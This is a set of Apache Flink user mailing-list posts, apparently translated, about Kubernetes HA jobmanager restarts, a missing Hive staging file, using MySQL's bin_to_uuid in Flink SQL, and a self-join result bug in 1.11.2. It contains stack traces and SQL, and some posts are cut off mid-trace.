    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket$2.onResponse(RealWebSocket.java:214) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.RealCall$AsyncCall.execute(RealCall.java:206) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.NamedRunnable.run(NamedRunnable.java:32) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_275]
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_275]
    at java.lang.Thread.run(Thread.java:748) [?:1.8.0_275]
2021-01-17 04:52:30,691 ERROR org.apache.flink.runtime.entrypoint.ClusterEntrypoint [] - Fatal error occurred in the cluster entrypoint.
org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-12c0ac13184d3d98af71dadbc4a81d03-jobmanager-leader
    at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherTog
Periodic jobmanager restarts with 1.12.1 in K8s HA session mode
It restarts roughly every few tens of minutes. Could anyone suggest how to investigate? The error thrown is identical every time, and a lot of ConfigMaps also accumulate as it runs. Below is one concrete instance of the error:

2021-01-17 04:16:46,116 ERROR org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] - Fatal error occurred in ResourceManager.
org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-42557c3f6325ffc876958430859178cd-jobmanager-leader
    at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherToggle.java:56) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.closeEvent(WatchConnectionManager.java:367) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.access$700(WatchConnectionManager.java:50) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager$1.onMessage(WatchConnectionManager.java:259) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.onReadMessage(RealWebSocket.java:323) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.readMessageFrame(WebSocketReader.java:219) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.processNextFrame(WebSocketReader.java:105) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.loopReader(RealWebSocket.java:274) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket$2.onResponse(RealWebSocket.java:214) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.RealCall$AsyncCall.execute(RealCall.java:206) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.NamedRunnable.run(NamedRunnable.java:32) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_275]
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_275]
    at java.lang.Thread.run(Thread.java:748) [?:1.8.0_275]
2021-01-17 04:16:46,117 ERROR org.apache.flink.runtime.entrypoint.ClusterEntrypoint [] - Fatal error occurred in the cluster entrypoint.
org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-42557c3f6325ffc876958430859178cd-jobmanager-leader
    at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherToggle.java:56) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.closeEvent(WatchConnectionManager.java:367) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.access$700(WatchConnectionManager.java:50) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager$1.onMessage(WatchConnectionManager.java:259) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.onReadMessage(RealWebSocket.java:323) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.readMessageFrame(WebSocketReader.java:219) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.processNextFrame(WebSocketReader.java:105) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.loopReader(RealWebSocket.java:274) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket$2.onResponse(RealWebSocket.java:214) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.RealCall$AsyncCall.execute(RealCall.java:206) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.NamedRunnable.run(NamedRunnable.java:32) [fl
Flink 1.12 insert into a Hive table cannot find the .staging_xxxx file
Flink 1.12 standalone cluster, with a scheduled batch-mode insert overwrite into a Hive table; a "missing .staging_ file" error occurs at random. The full error message follows:

org.apache.flink.runtime.JobException: Recovery is suppressed by NoRestartBackoffTimeStrategy
    at org.apache.flink.runtime.executiongraph.failover.flip1.ExecutionFailureHandler.handleFailure(ExecutionFailureHandler.java:116)
    at org.apache.flink.runtime.executiongraph.failover.flip1.ExecutionFailureHandler.getGlobalFailureHandlingResult(ExecutionFailureHandler.java:89)
    at org.apache.flink.runtime.scheduler.DefaultScheduler.handleGlobalFailure(DefaultScheduler.java:240)
    at org.apache.flink.runtime.scheduler.UpdateSchedulerNgOnInternalFailuresListener.notifyGlobalFailure(UpdateSchedulerNgOnInternalFailuresListener.java:65)
    at org.apache.flink.runtime.executiongraph.ExecutionGraph.failGlobal(ExecutionGraph.java:1055)
    at org.apache.flink.runtime.executiongraph.ExecutionGraph.vertexFinished(ExecutionGraph.java:1305)
    at org.apache.flink.runtime.executiongraph.ExecutionVertex.executionFinished(ExecutionVertex.java:849)
    at org.apache.flink.runtime.executiongraph.Execution.markFinished(Execution.java:1127)
    at org.apache.flink.runtime.executiongraph.ExecutionGraph.updateStateInternal(ExecutionGraph.java:1512)
    at org.apache.flink.runtime.executiongraph.ExecutionGraph.updateState(ExecutionGraph.java:1485)
    at org.apache.flink.runtime.scheduler.SchedulerBase.updateTaskExecutionState(SchedulerBase.java:604)
    at org.apache.flink.runtime.scheduler.SchedulerNG.updateTaskExecutionState(SchedulerNG.java:89)
    at org.apache.flink.runtime.jobmaster.JobMaster.updateTaskExecutionState(JobMaster.java:419)
    at sun.reflect.GeneratedMethodAccessor56.invoke(Unknown Source)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:498)
    at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleRpcInvocation(AkkaRpcActor.java:286)
    at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleRpcMessage(AkkaRpcActor.java:201)
    at org.apache.flink.runtime.rpc.akka.FencedAkkaRpcActor.handleRpcMessage(FencedAkkaRpcActor.java:74)
    at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleMessage(AkkaRpcActor.java:154)
    at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:26)
    at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:21)
    at scala.PartialFunction$class.applyOrElse(PartialFunction.scala:123)
    at akka.japi.pf.UnitCaseStatement.applyOrElse(CaseStatements.scala:21)
    at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:170)
    at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:171)
    at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:171)
    at akka.actor.Actor$class.aroundReceive(Actor.scala:517)
    at akka.actor.AbstractActor.aroundReceive(AbstractActor.scala:225)
    at akka.actor.ActorCell.receiveMessage(ActorCell.scala:592)
    at akka.actor.ActorCell.invoke(ActorCell.scala:561)
    at akka.dispatch.Mailbox.processMailbox(Mailbox.scala:258)
    at akka.dispatch.Mailbox.run(Mailbox.scala:225)
    at akka.dispatch.Mailbox.exec(Mailbox.scala:235)
    at akka.dispatch.forkjoin.ForkJoinTask.doExec(ForkJoinTask.java:260)
    at akka.dispatch.forkjoin.ForkJoinPool$WorkQueue.runTask(ForkJoinPool.java:1339)
    at akka.dispatch.forkjoin.ForkJoinPool.runWorker(ForkJoinPool.java:1979)
    at akka.dispatch.forkjoin.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:107)
Caused by: java.lang.Exception: Failed to finalize execution on master
    ... 33 more
Caused by: org.apache.flink.table.api.TableException: Exception in finalizeGlobal
    at org.apache.flink.table.filesystem.FileSystemOutputFormat.finalizeGlobal(FileSystemOutputFormat.java:97)
    at org.apache.flink.runtime.jobgraph.InputOutputFormatVertex.finalizeOnMaster(InputOutputFormatVertex.java:131)
    at org.apache.flink.runtime.executiongraph.ExecutionGraph.vertexFinished(ExecutionGraph.java:1299)
    ... 32 more
Caused by: java.io.FileNotFoundException: File hdfs://service1/user/hive/warehouse/snmpprobe.db/p_port_packet_loss_5m/.staging_1609040810292 does not exist.
    at org.apache.hadoop.hdfs.DistributedFileSystem.listStatusInternal(DistributedFileSystem.java:901)
    at org.apache.hadoop.hdfs.DistributedFileSystem.access$600(DistributedFileSystem.java:112)
    at org.apache.hadoop.hdfs.DistributedFileSystem$22.doCall(DistributedFileSystem.java:961)
    at org.apache.hadoop.hdfs.DistributedFileSystem$22.doCall(DistributedFileSystem.java:958)
    at org.apache.hadoop.fs.FileSystemLinkResolver.resolve(FileSystemLinkResolver.java:81)
    at org.apache.hadoop.hdfs.DistributedFileSystem.listStatus(DistributedFileSystem.java:958)
    at org.apache.flink.hive.shaded.fs.hdfs.HadoopFileSystem.listStatus(HadoopFileSystem.java:165)
    at org.apache.flink.table.filesystem.PartitionTempFileManager.headCheckpoints(PartitionTempFileManager.java:140)
    at org.apache.flink.table.filesystem.FileSystemCommitter.commitUpToCheckpoint(FileSystemCommitter.java:98)
    at org.apache.flink.table.filesystem.FileSystemOutpu
Can MySQL stored procedures and functions be used in Flink SQL?
The need is this: MySQL stores UUIDs as binary(16), and once read into Flink they need to be converted into the textual UUID form. The SQL is:

select bin_to_uuid(id, true) as text_uuid from usertable

When I try this, it fails saying bin_to_uuid cannot be found.
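For context, bin_to_uuid is a MySQL server-side function, and the Flink JDBC connector evaluates query expressions inside Flink, so MySQL functions are not visible there. One possible workaround is a user-defined function registered in Flink SQL. A minimal sketch, where com.example.udf.BinToUuid is a hypothetical class that would have to be implemented (taking BYTES, returning the 36-character UUID string) and placed on the classpath:

-- Register the hypothetical UDF, then use it in place of MySQL's function.
CREATE TEMPORARY FUNCTION bin_to_uuid AS 'com.example.udf.BinToUuid';

SELECT bin_to_uuid(id) AS text_uuid
FROM usertable;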
Re: Incorrect results for a Hive table self-join (self inner join) with flink 1.11.2
Answering my own question for others' reference: after switching to flink 1.12.0-rc1 and running the same SQL over the same data, the results match what Hive computes. This confirms a bug in 1.11.2 that appears to be fixed in 1.12.
Incorrect self inner join results in the flink 1.11.2 SQL Client
I inner join one table with itself at two different points in time and get identical values back. The SQL is as follows; p5m and p0m are both the snmpprobe.p_snmp_ifxtable table, at different times:

select p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c, p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d
from snmpprobe.p_snmp_ifxtable as p0m
inner join snmpprobe.p_snmp_ifxtable as p5m
  on p0m.id = p5m.id and p0m.mibindex = p5m.mibindex
where p5m.dt = '2020-11-23' and p5m.hh = '01' and p5m.mi = '00'
  and p5m.mibindex = 4 and p5m.ip = '172.31.28.4'
  and p0m.dt = '2020-11-23' and p0m.hh = '00' and p0m.mi = '55';

Executed in the Flink SQL client, the result (coltime, a, c, coltime0, b, d) is:

2020-11-23T01:00, 3702300836, 5541513669, 2020-11-23T01:00, 3702300836, 5541513669

Here coltime = coltime0 (both 2020-11-23T01:00), and a = b, c = d. The Hive command line returns:

2020-11-23 00:55:00.0, 3702187169, 5541332531, 2020-11-23 01:00:00.0, 3702300836, 5541513669

i.e. coltime = 2020-11-23 00:55:00.0, coltime0 = 2020-11-23 01:00:00.0, and a != b, c != d. The Flink result is clearly wrong. Does a self join in Flink SQL require some special syntax?
Incorrect results for a Hive table self-join (self inner join) with flink 1.11.2
I inner join one table with itself at two different points in time and get identical values back. The SQL is as follows; p5m and p0m are both the snmpprobe.p_snmp_ifxtable table, at different times:

select p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c, p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d
from snmpprobe.p_snmp_ifxtable as p0m
inner join snmpprobe.p_snmp_ifxtable as p5m
  on p0m.id = p5m.id and p0m.mibindex = p5m.mibindex
where p5m.dt = '2020-11-23' and p5m.hh = '01' and p5m.mi = '00'
  and p5m.mibindex = 4 and p5m.ip = '172.31.28.4'
  and p0m.dt = '2020-11-23' and p0m.hh = '00' and p0m.mi = '55';

Executed in the Flink SQL client, the result (coltime, a, c, coltime0, b, d) is:

2020-11-23T01:00, 3702300836, 5541513669, 2020-11-23T01:00, 3702300836, 5541513669

Here coltime = coltime0 (both 2020-11-23T01:00), and a = b, c = d. The Hive command line returns:

2020-11-23 00:55:00.0, 3702187169, 5541332531, 2020-11-23 01:00:00.0, 3702300836, 5541513669

i.e. coltime = 2020-11-23 00:55:00.0, coltime0 = 2020-11-23 01:00:00.0, and a != b, c != d. The Flink result is clearly wrong. Does a self join in Flink SQL require some special syntax?